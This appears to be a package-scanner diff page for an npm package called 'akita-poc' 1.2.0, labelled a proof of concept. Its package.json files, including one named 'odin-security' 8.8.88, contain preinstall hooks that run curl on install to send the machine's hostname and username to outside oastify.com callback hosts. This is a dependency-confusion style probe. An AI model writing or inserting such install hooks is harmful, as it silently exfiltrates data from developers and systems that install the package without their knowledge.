akita-poc 1.2.0

Sign up to get free protection for your applications and to get access to all the features.
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // index.js
2
+ console.log("odin package");
3
+
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "akita-poc",
3
+ "version": "1.2.0",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl --data-urlencode info=$(hostname && whoami) http://479pa367cl3elrpuciye4inib9h65wtl.oastify.com"
9
+ },
10
+ "author": "Akita",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "account": "^1.0.0"
14
+ }
15
+ }
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "odin-security",
3
+ "version": "8.8.88",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl “info=$(hostname && whoami)” http://r6yc9q5ub821keohb5x135m5awgq4gs5.oastify.com"
9
+ },
10
+ "author": "Akita",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "account": "^1.0.0"
14
+ }
15
+ }